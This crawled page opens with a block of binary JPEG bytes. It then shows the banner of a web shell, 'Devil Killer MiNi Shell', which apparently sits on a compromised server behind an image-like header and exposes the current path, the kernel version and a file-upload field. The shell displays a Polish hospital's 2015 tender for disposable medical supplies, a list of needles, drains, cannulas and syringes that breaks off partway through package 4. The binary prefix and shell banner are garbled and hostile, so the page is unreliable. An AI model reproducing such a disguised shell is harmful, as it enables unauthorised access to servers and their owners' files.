JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150429/60997-N-2015.html

<p class="kh_header"><b>Tarnowskie Góry: SUKCESYWNE  DOSTAWY  SPRZĘTU  MEDYCZNEGO JEDNORAZOWEGO UŻYTKU</b><br>
<b>Numer ogłoszenia: 60997 - 2015; data zamieszczenia: 29.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Powiatowy Spółka Akcyjna , ul. Pyskowicka 47-51, 42-612 Tarnowskie Góry, woj. śląskie, tel. 32 285 40 58, faks 32 384 54 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wspsa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE  DOSTAWY  SPRZĘTU  MEDYCZNEGO JEDNORAZOWEGO UŻYTKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest są sukcesywne dostawy sprzętu medycznego jednorazowego użytku. Zamówienie składa się z 8 części tzw. pakietów, z których każdy stanowi oddzielny przedmiot zamówienia        
Pakiet 1    Igły
Pakiet 2    Szczoteczka do wymazów cytologicznych
Pakiet 3    Dreny i zestawy do drenażu
Pakiet 4    Infuzja dożylna, przyrządy do przetaczań, sprzęt medyczny jednorazowy sterylny
Pakiet 5    Sprzęt medyczny jednorazowy sterylny laryngologiczny
Pakiet 6    Sprzęt medyczny jednorazowy sterylny 1
Pakiet 7    Sprzęt medyczny jednorazowy sterylny 2
Pakiet 8    Sprzęt medyczny jednorazowy sterylny 3
2. Szczegółowy opis przedmiotu zamówienia - asortyment i ilość- zawarte są w załączniku [D] SIWZ  
              Formularz cenowy          .
3. Składane oferty muszą  zawierać pełny zakres przedmiotu zamówienia w zakresie danego pakietu.
4. Wykonawca gwarantuje, że przedmiot i warunki realizacji zamówienia w całym okresie wykonywania umowy będą posiadać aktualne świadectwa dopuszczenia do obrotu na rynku polskim zgodne z ustawą
o wyrobach medycznych z dnia 20 maja 2010r.  (Dz. U. nr 107 poz. 679 z 20.05.2010r.) oraz z innymi obowiązującymi przepisami prawnymi w tym zakresie. Wszystkie oferowane produkty spełniają właściwe dla każdego z nich wymogi jakościowe co do opakowania i przechowywania oraz posiadają pozwolenie dopuszczające daną serię do obrotu wydawaną każdorazowo przez uprawniony organ. Termin ważności wszystkich wyrobów w dniu dostawy będzie wynosił co najmniej 1       3 terminu nadanego przez producenta.
5.  Zamawiający zastrzega sobie prawo realizowania zamówień w ilościach uzależnionych od rzeczywistych potrzeb i posiadanych środków oraz do ograniczenia zamówienia w zakresie rzeczowym i ilościowym,
co nie jest odstąpieniem od umowy nawet w części.
6. Zamawiający zastrzega sobie prawo do zmiany limitów ilościowych zamawianego asortymentu w stosunku
do określonych w poszczególnych pozycjach pakietu, stanowiącego załącznik do umowy zarówno           in plus          
jak i           in minus          , bez zmiany wartości brutto przedmiotu umowy określonej w § 2 ust. 1 projektu umowy,
a Wykonawca wyraża na to zgodę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia, zgodnie z załącznikiem [E.1] do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">-   opisy wyrobów, które mają być dostarczone, których autentyczność musi zostać poświadczona
przez wykonawcę, w postaci katalogu, folderu lub ulotki z opakowania handlowego lub innego dokumentu, w celu weryfikacji zgodności oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.
    -   oświadczenie według załącznika [C] do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony szczegółowo formularz oferty - część [C] stanowiący załącznik do SIWZ
2. Wypełniony formularz cenowy - część [D] stanowiący załącznik do SIWZ
3. Wzór oświadczeń - część [E.1], [E.2]stanowiący załącznik do SIWZ
4. Wzór oświadczeń - część [F] stanowiący załącznik do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostaw CITO - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony pod rygorem nieważności i będą dopuszczalne w granicach unormowania artykułu 144 ustawy Prawo zamówień publicznych. 
2.  Strony dopuszczają zmiany umowy w zakresie:
    a)  zmiany stawki podatku od towarów i usług, gdzie zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian.
    b)  zmiany ceny korzystne dla Zamawiającego wynikające z obniżenia ceny.          
3. Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu objętego umową  odpowiednikiem w przypadku:
    a)  zaprzestania wytwarzania produktu objętego umową,
    b)  wygaśnięcia świadectwa rejestracji,
    c)  czasowego braku dostępności produktu objętego umową.
    Każda zmiana asortymentu wymaga wcześniejszego pisemnego lub telefonicznego (z potwierdzeniem faksem) uzgodnienia. Osobą upoważnioną do uzgodnień lub do akceptacji równoważnego produktu ze strony Zamawiającego jest Kierownik Apteki Szpitalnej. Zmiany w tym zakresie nie wymagają aneksów do umowy.
4.  Zmiany umowy z pominięciem ust. 3 niniejszego paragrafu wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wspsa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Dział zamówień publicznych, budynek administracji.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2015 godzina 10:30, miejsce: Wielospecjalistyczny Szpital Powiatowy S.A. w Tarnowskich Górach przy ul. Pyskowickiej 47-51 - Sekretariat, budynek administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 - Igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Igła do penów rozm. 29G (0,33 x 12,7 mm) a 100 szt.	5	op
2	Igła j.uż. 0,5 -0,9 posiadająca barwny kod odpowiadający rozmiarowi umieszczony na opak. jednostkowym a 100 szt.	130	op
3	Igła j.uż. 1,1 - 1,2posiadająca barwny kod odpowiadający rozmiarowi umieszczony na opak. jednostkowym a 100 szt.	70	op
4	Igła motylek z końcówką luer-lock w rozmiarach: 18G, 19G, 20G, 21G, 22G, 23G, 25G, 	10	szt
5	Igła do bezpiecznego pobierania leku, jałowa 1,2 x 30-40 mm (18G) a 100 szt. 	100	op
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2 - Szczoteczka do wymazów cytologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Szczoteczka do wymazów cytologicznych umożliwiająca pobranie w rozmazie jednocześnie komórek z szyjki macicy, kanału szyjki, tarczy i strefy transformacji, umożliwaiająca uzyskanie materiału bogatego w komórki endocerwikalne oraz prowadząca do detekcji zwiększonej ilości wirusa onkogennego HPV	100	szt
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3 - Dreny i zestawy do drenażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Dren Kehr wykonany z 100% lateksu Ch12 - Ch20 opakowanie papierowo - foliowe 	3	szt
2	Zestaw do drenażu pooperacyjnego ran, pojemnik mieszek 400ml, dren łączący, zawór samozamykający umożliwiający ponowne wytwarzenie podciśnienia bez rozłączania zestawu, podwójnie pakowany w worek foliowy i zewn. opakowanie foliowo-papierowe	6	szt
3	Zestaw do drenażu pooperacyjnego ran, pojemnik mieszek 400ml, dren łączący, zawór samozamykający umożliwiający ponowne wytwarzenie podciśnienia bez rozłączania zestawu, dren łączący, dren Redona Ch8-18, podwójnie pakowany w worek foliowy i zewn. opakowanie foliowo-papierowe	30	szt
4	Pojemnik mieszek (harmonijka) o poj. 400ml, do długotrwałego odsysania ran z mozliwością połączenia z drenami 	15	szt
5	Dren REDONA Ch10-Ch18 ze znacznikiem RTG dł. min.70 cm	8	szt
6	Dren REDONA Ch10-Ch18 ze znacznikiem RTG dł. min.150 cm	80	szt
7	Ostrza chirurgiczne sterylne rozm.10 -26 , ze stali węglowej, opak. znaczone kolorystycznie w zależności od rozmiaru i kształtu ostrza (nr ostrza i nazwa producenta wygrawerowane bezpośrednio na ostrzu) a 100szt.	10	op
8	Skalpele sterylne rozm.10-26 - ostrze ze stali nierdzwewnej z wygrawerowanym numerem i z rączką plastikową z nazwą producenta op. a 10 szt	2	op
Wymagania  Zamawiającego
1. Do oferty należy dołączyć: katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.17.10.00-9, 33.18.15.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostaw CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 - Infuzja dożylna, przyrządy do przetaczań, sprzęt medyczny jednorazowy sterylny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa międzynarodowa	Ilość 	Jedn. miary  
1	Kaniula dożylna bezpieczna, z samozamykającym się portem bocznym
umieszczonym nad skrzydełkami mocującymi. Wykonana z poliuretanu wyposażona
w automatyczny metalowy zatrzask zabezpieczający igłę przed zakłuciem,
uruchamiany zaraz po użyciu igły. Kaniula posiada następujące cechy
zwiększające bezpieczeństwo stosowania               
1. Łagodnie zwężający się koniec
kaniuli
2. Przejrzysty uchwyt zamykany koreczkiem z hydrofobowym filtrem
3 Oznaczenie przepływu na opakowaniu jednostkowym
4. 4 paski kontrastujące w rtg. 
Rozmiary                14,16,17,18,20,22 i 24G.	3000	szt.
2	Kaniula dożylna obwodowa ze skrzydełkami z portem bocznym, materiał cewnika PTFE lub PUR              wyposażona w korek samodomykający się, filtr hydrofobowy oraz skrzydełka ułatwiające mocowanie              posiadająca 4 paski kontrastujące              roz 14G-24G do wyboru przez zamawiającego	800	szt.
3	Kaniula dożylna obwodowa wykonana z FEP lub PU posiadająca filtr hydrofobowy, port boczny,samodomykający się korek,jałowa, nietoksyczna, apirogenna,z kontrastem Rtg (min 2 linie ),wbudowany plastikowy element bezpieczeństwa pasywnego,nakrywający igłę po wyjęciu w celu zapobiegania przypadkowemu nakłuciu, 26 G fioletowa 	70	szt.
4	Koreczki do kaniul dożylnych standardowe, kompatybilne z kaniulą	1500	szt.
5	Koreczki typu Combi 	120	szt.
6	Strzykawka dwuczęściowa 2ml. Luer jednorazowego użytku z mlecznym tłokiem do łatwiejszego odczytu wypełnionej strzykawki, nie zawierająca lateksu, czarną widoczną skalą, wykonanie               kopolimer etylenowo-propylenowy. Z rozszerzoną skalą . a            100szt	90	szt.
7	Strzykawka dwuczęściowa 5ml. Luer jednorazowego użytku z mlecznym tłokiem do łatwiejszego odczytu wypełnionej strzykawki, nie zawierająca lateksu, czarną widoczną skalą, wykonanie               kopolimer etylenowo-propylenowy. Z rozszerzoną skalą . a            100szt.	100	szt.
8	Strzykawka dwuczęściowa 10ml. Luer jednorazowego użytku z mlecznym tłokiem do łatwiejszego odczytu wypełnionej strzykawki, nie zawierająca lateksu, czarną widoczną skalą, wykonanie               kopolimer etylenowo-propylenowy. Z rozszerzoną skalą . a            100szt.	110	szt.
